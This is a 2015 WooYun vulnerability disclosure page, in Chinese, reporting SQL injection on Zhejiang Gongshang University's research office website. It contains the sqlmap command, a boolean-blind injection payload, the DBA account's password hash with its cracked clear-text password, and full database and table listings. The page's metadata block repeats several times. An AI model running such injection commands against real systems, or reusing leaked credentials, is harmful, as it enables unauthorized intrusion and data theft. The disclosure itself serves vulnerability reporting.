浙江工商大学科技处网站存在SQL注入漏洞（DBA权限\sa密码泄露\九千多用户信息泄露）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155636

漏洞标题：浙江工商大学科技处网站存在SQL注入漏洞（DBA权限\sa密码泄露\九千多用户信息泄露）

漏洞作者：路人甲

提交时间：2015-11-25 14:38

修复时间：2015-11-30 14:40

公开时间：2015-11-30 14:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-25：细节已通知厂商并且等待厂商处理中
2015-11-30：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

浙江工商大学科技处网站存在SQL注入漏洞（DBA权限\sa密码泄露\九千多用户信息泄露）

详细说明：

地址：http://**.**.**.**/kyc_new/news.do?ActionMethod=view&id=534

$ python sqlmap.py -u "http://**.**.**.**/kyc_new/news.do?ActionMethod=view&id=534" -p id --technique=B --random-agent --batch --search -C pass

Database: kyc
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.Work                                   | 9401    |
Database: kyc
Table: Work
[40 columns]
+--------------------+---------------+
| Column             | Type          |
+--------------------+---------------+
| adjust             | decimal       |
| auditDate1         | smalldatetime |
| auditDate2         | smalldatetime |
| auditDate3         | smalldatetime |
| auditId1           | char          |
| auditId2           | char          |
| auditId3           | char          |
| auditMemo1         | nvarchar      |
| auditMemo2         | nvarchar      |
| auditMemo3         | nvarchar      |
| bookWcPoints       | decimal       |
| collaboratorWorkId | int           |
| indexPoints        | decimal       |
| indexType          | nvarchar      |
| inputDate          | smalldatetime |
| inputMemo          | nvarchar      |
| issnIsbn           | char          |
| issue              | nvarchar      |
| issueTitle         | nvarchar      |
| kiloWords          | smallint      |
| levelid            | tinyint       |
| loginName          | char          |
| orderPoints        | decimal       |
| orderType          | nvarchar      |
| pages              | smallint      |
| pubHouse           | nvarchar      |
| pubMonth           | smallint      |
| pubYear            | smallint      |
| rankPoints         | decimal       |
| rankType           | nvarchar      |
| signPoints         | decimal       |
| signType           | nvarchar      |
| startPage          | smallint      |
| status             | tinyint       |
| totalPoints        | decimal       |
| vol                | nvarchar      |
| wcPoints           | decimal       |
| wcType             | nvarchar      |
| workId             | int           |
| workTitle          | nvarchar      |
+--------------------+---------------+

漏洞证明：

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ActionMethod=view&id=534' AND 1276=1276 AND 'mrHr'='mrHr
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
current user:    'sa'
current user is DBA:    True
database management system users [3]:
[*] BUILTIN\\Administrators
[*] sa
[*] sa1
database management system users password hashes:
[*] sa [1]:
    password hash: 0x01004c5c1806ad4bdd3c901e88cff6c1b7e3d5df5c90b99ae1de6143422c4dbba09a3ba556e19a4a0a1c39546ec1
        header: 0x0100
        salt: 4c5c1806
        mixedcase: ad4bdd3c901e88cff6c1b7e3d5df5c90b99ae1de
        uppercase: 6143422c4dbba09a3ba556e19a4a0a1c39546ec1
    clear-text password: sql
[*] sa1 [1]:
    password hash: 0x01!
Database: tempdb
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.syssegments                            | 3       |
+--------------------------------------------+---------+
Database: kyc
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.Work                                   | 9401    |
| dbo.sqlmapoutput                           | 4352    |
| dbo.oldwork                                | 3563    |
| dbo.Journal_temp                           | 1824    |
| dbo.OutlayDetail                           | 1344    |
| dbo.Award                                  | 592     |
| dbo.Outlay                                 | 109     |
| dbo.news                                   | 81      |
| dbo.func                                   | 51      |
| dbo.College                                | 46      |
| dbo.sort                                   | 39      |
| dbo.pointshz                               | 29      |
| dbo.结果                                       | 29      |
| dbo.AwardTypeObj                           | 25      |
| dbo.OrderTypeObj                           | 22      |
| dbo.pbcatedt                               | 21      |
| dbo.kill_kk                                | 20      |
| dbo.PrjSource                              | 20      |
| dbo.Tables                                 | 20      |
| dbo.Journal                                | 17      |
| dbo.PrjRank                                | 17      |
| dbo.GroupUser                              | 15      |
| dbo.WorkMember                             | 15      |
| dbo.zlmb_tr                                | 15      |
| **.**.**.**s                                   | 14      |
| dbo.SignTypeObj                            | 12      |
| dbo.TypePoints                             | 11      |
| dbo.AwardSignTypeObj                       | 6       |
| dbo.IndexTypeObj                           | 6       |
| dbo.manager                                | 6       |
| dbo.PrjAwdRatio                            | 6       |
| dbo.stuff                                  | 6       |
| dbo.BookWcTypeObj                          | 5       |
| dbo.glgz                                   | 5       |
| dbo.download                               | 4       |
| dbo.level                                  | 3       |
| dbo.WcTypeObj                              | 3       |
+--------------------------------------------+---------+
Database: kyc22
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.Work                                   | 9471    |
| dbo.oldwork                                | 6563    |
| dbo.ProjectPoints                          | 3385    |
| dbo.Journal                                | 1831    |
| dbo.Journal_temp                           | 1824    |
| dbo.GroupUser                              | 1629    |
| dbo.newTable1                              | 1545    |
| dbo.RegUser                                | 1545    |
| dbo.OutlayDetail                           | 1345    |
| dbo.pointshz                               | 1295    |
| dbo.notify                                 | 1246    |
| dbo.Outlay                                 | 1091    |
| dbo.Award                                  | 592     |
| dbo.结果                                       | 290     |
| dbo.news                                   | 259     |
| dbo.Communication                          | 254     |
| dbo.TypePoints                             | 113     |
| dbo.priv                                   | 82      |
| dbo.func                                   | 51      |
| dbo.College                                | 46      |
| dbo.Department                             | 46      |
| dbo.document                               | 46      |
| dbo.sort                                   | 39      |
| dbo.fff                                    | 38      |
| dbo.RankTypeObj                            | 33      |
| dbo.Tables                                 | 29      |
| dbo.AwardTypeObj                           | 25      |
| dbo.OrderTypeObj                           | 22      |
| dbo.pbcatedt                               | 21      |
| dbo.kill_kk                                | 20      |
| dbo.pbcatfmt                               | 20      |
| dbo.PrjSource                              | 20      |
| dbo.sere                                   | 20      |
| dbo.PrjRank                                | 19      |
| dbo.WorkMember                             | 15      |
| dbo.zlmb_tr                                | 15      |
| **.**.**.**s                                   | 14      |
| dbo.SignTypeObj                            | 12      |
| dbo.download                               | 9       |
| dbo.kyjhhyh                                | 9       |
| dbo.WcTypeObj                              | 9       |
| dbo.AwardSignTypeObj                       | 6       |
| dbo.D99_Tmp                                | 6       |
| dbo.IndexTypeObj                           | 6       |
| dbo.manager                                | 6       |
| dbo.PrjAwdRatio                            | 6       |
| dbo.ProductionType                         | 6       |
| dbo.stuff                                  | 6       |
| dbo.BookWcTypeObj                          | 5       |
| dbo.glgz                                   | 5       |
| dbo.status                                 | 5       |
| dbo.sysconstraints                         | 5       |
| dbo.UserGroup                              | 5       |
| dbo.dlmb_tr                                | 3       |
| dbo.level                                  | 3       |
| dbo.syssegments                            | 3       |
| dbo.harvest                                | 2       |
| dbo.prjlevel                               | 2       |
| dbo.project                                | 2       |
| dbo.D99_REG                                | 1       |
| dbo.depart_z                               | 1       |
| dbo.guizu                                  | 1       |
| dbo.kycxcl                                 | 1       |
+--------------------------------------------+---------+
Database: pubs
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.sysconstraints                         | 34      |
| dbo.titleview                              | 25      |
| dbo.authors                                | 23      |
| dbo.publishers                             | 8       |
| dbo.titles                                 | 8       |
| dbo.stores                                 | 6       |
| dbo.discounts                              | 3       |
| dbo.pub_info                               | 3       |
| dbo.syssegments                            | 2       |
| dbo.sales                                  | 1       |
+--------------------------------------------+---------+
Database: master
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| INFORMATION_SCHEMA.PARAMETERS              | 3710    |
| INFORMATION_SCHEMA.ROUTINES                | 1050    |
| dbo.spt_values                             | 730     |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES       | 400     |
| INFORMATION_SCHEMA.COLUMNS                 | 399     |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE       | 302     |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS         | 159     |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE        | 63      |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES        | 39      |
| INFORMATION_SCHEMA.TABLES                  | 37      |
| dbo.spt_datatype_info                      | 36      |
| dbo.spt_server_info                        | 29      |
| INFORMATION_SCHEMA.VIEWS                   | 26      |
| dbo.spt_provider_types                     | 25      |
| dbo.spt_datatype_info_ext                  | 10      |
| INFORMATION_SCHEMA.SCHEMATA                | 8       |
| dbo.sysconstraints                         | 3       |
| dbo.syslogins                              | 3       |
| dbo.syssegments                            | 3       |
| dbo.MSreplication_options                  | 2       |
| INFORMATION_SCHEMA.CONSTRAINT_COLUMN_USAGE | 2       |
| INFORMATION_SCHEMA.KEY_COLUMN_USAGE        | 2       |
| dbo.spt_monitor                            | 1       |
| dbo.sysoledbusers                          | 1       |
| INFORMATION_SCHEMA.CONSTRAINT_TABLE_USAGE  | 1       |
| INFORMATION_SCHEMA.TABLE_CONSTRAINTS       | 1       |
+--------------------------------------------+---------+
Database: msdb
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.RTblVersions                           | 324     |
| dbo.RTblRelColDefs                         | 320     |
| dbo.RTblRelshipDefs                        | 144     |
| dbo.sysconstraints                         | 99      |
| dbo.RTblRelshipProps                       | 28      |
| dbo.syscategories                          | 17      |
| dbo.RTblTypeLibs                           | 16      |
| dbo.backupset                              | 5       |
| dbo.RTblRelships                           | 4       |
| dbo.syssegments                            | 3       |
| dbo.backupmediafamily                      | 2       |
| dbo.backupmediaset                         | 2       |
| dbo.RTblNamedObj                           | 2       |
| dbo.sysjobhistory                          | 2       |
| dbo.sysdbmaintplans                        | 1       |
| dbo.sysjobs_view                           | 1       |
| dbo.sysjobservers                          | 1       |
| dbo.systargetservers_view                  | 1       |
+--------------------------------------------+---------+
Database: model
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.syssegments                            | 3       |
+--------------------------------------------+---------+
Database: Northwind
+--------------------------------------------+---------+
| Table                                      | Entries |
+--------------------------------------------+---------+
| dbo.[Quarterly Orders]                     | 86      |
| dbo.Products                               | 77      |
| dbo.[Alphabetical list of products]        | 69      |
| dbo.[Products by Category]                 | 69      |
| dbo.Territories                            | 53      |
| dbo.sysconstraints                         | 43      |
| dbo.[Products Above Average Price]         | 25      |
| dbo.[Category Sales for 1997]              | 8       |
| dbo.Categories                             | 8       |
| dbo.Region                                 | 4       |
| dbo.syssegments                            | 3       |
+--------------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ActionMethod=view&id=534' AND 1276=1276 AND 'mrHr'='mrHr
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ActionMethod=view&id=534' AND 1276=1276 AND 'mrHr'='mrHr
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
available databases [8]:
[*] kyc
[*] kyc22
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: ActionMethod=view&id=534' AND 1276=1276 AND 'mrHr'='mrHr
---
web application technology: JSP
back-end DBMS: Microsoft SQL Server 2000
Database: kyc
Table: Work
[40 columns]
+--------------------+---------------+
| Column             | Type          |
+--------------------+---------------+
| adjust             | decimal       |
| auditDate1         | smalldatetime |
| auditDate2         | smalldatetime |
| auditDate3         | smalldatetime |
| auditId1           | char          |
| auditId2           | char          |
| auditId3           | char          |
| auditMemo1         | nvarchar      |
| auditMemo2         | nvarchar      |
| auditMemo3         | nvarchar      |
| bookWcPoints       | decimal       |
| collaboratorWorkId | int           |
| indexPoints        | decimal       |
| indexType          | nvarchar      |
| inputDate          | smalldatetime |
| inputMemo          | nvarchar      |
| issnIsbn           | char          |
| issue              | nvarchar      |
| issueTitle         | nvarchar      |
| kiloWords          | smallint      |
| levelid            | tinyint       |
| loginName          | char          |
| orderPoints        | decimal       |
| orderType          | nvarchar      |
| pages              | smallint      |
| pubHouse           | nvarchar      |
| pubMonth           | smallint      |
| pubYear            | smallint      |
| rankPoints         | decimal       |
| rankType           | nvarchar      |
| signPoints         | decimal       |
| signType           | nvarchar      |
| startPage          | smallint      |
| status             | tinyint       |
| totalPoints        | decimal       |
| vol                | nvarchar      |
| wcPoints           | decimal       |
| wcType             | nvarchar      |
| workId             | int           |
| workTitle          | nvarchar      |
+--------------------+---------------+

修复方案：

增加过滤

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-11-30 14:40

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155636

漏洞标题：浙江工商大学科技处网站存在SQL注入漏洞（DBA权限\sa密码泄露\九千多用户信息泄露）

相关厂商：浙江工商大学科技处

漏洞作者：路人甲

提交时间：2015-11-25 14:38

修复时间：2015-11-30 14:40

公开时间：2015-11-30 14:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0155636

漏洞标题：浙江工商大学科技处网站存在SQL注入漏洞（DBA权限\sa密码泄露\九千多用户信息泄露）

相关厂商：浙江工商大学科技处

漏洞作者： 路人甲

提交时间：2015-11-25 14:38

修复时间：2015-11-30 14:40

公开时间：2015-11-30 14:40

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(CCERT教育网应急响应组)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0155636"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云